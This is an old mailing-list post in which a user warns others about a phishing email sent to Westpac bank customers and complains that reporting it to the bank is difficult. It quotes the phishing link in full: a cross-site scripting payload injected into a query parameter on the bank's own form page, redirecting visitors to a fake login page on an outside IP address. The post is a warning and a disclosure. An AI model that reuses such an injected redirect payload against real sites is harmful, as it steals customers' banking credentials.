[LINK] Phishing plumbs new depths for Westpac Customers: XSS
Rick Welykochy
rick at praxis.com.au
Tue Nov 21 11:02:48 AEDT 2006
Just ran across this attempt at phishing for my Westpac username and password:
(snipped from the phishing email)
Westpac Banking
No additional action is required by you to continue to
use your online services.
To review the changes [to Terms and Conditions], click on the link below:
and here is the link:
https://www.westpac.com.au/forms/AskWestpac.nsf/
f_askWestpac?OpenForm&refTitle=<script>document.location=
'http://203.144.80.87/manual/.modonline/new.html'</script>
I broke up the link into 3 parts for readability. The link does actually
look valid, it takes you to the Westpac secure web site, but then the
XSS (cross-site scripting) redirects you to a fake login page at
http://203.144.80.87/manual/.modonline/new.html.
Try http://tinyurl.com/tksrx if you wish to see it in action.
I'm afraid this one might catch all but the technically savvy amongst us.
Westpac has been contacted about this. Unfortunately, their website has web-based
forms only for email and no interface is provided to alert their IT staff to
the existence of such a hoax as the one above. I had to submit the email and
further details via a pitifully inadequate web form. I have my doubts as to
how far into the system my alert will survive. And I note with some annoyance that
the link for actual feedback does not work (never returns a page) so I had to
use a far less appropriate page.
The page that would not respond to my browser is here:
http://www.westpac.com.au/Forms/single_page_forms.nsf/f_customerServiceFeedbackServiceProblem
Can other Linkers actaully see this page? I cannot, neither with Firefox
or with Safari.
cheers
rickw
--
_________________________________
Rick Welykochy || Praxis Services
Welcome to the department of redundancy department.
More information about the Link
mailing list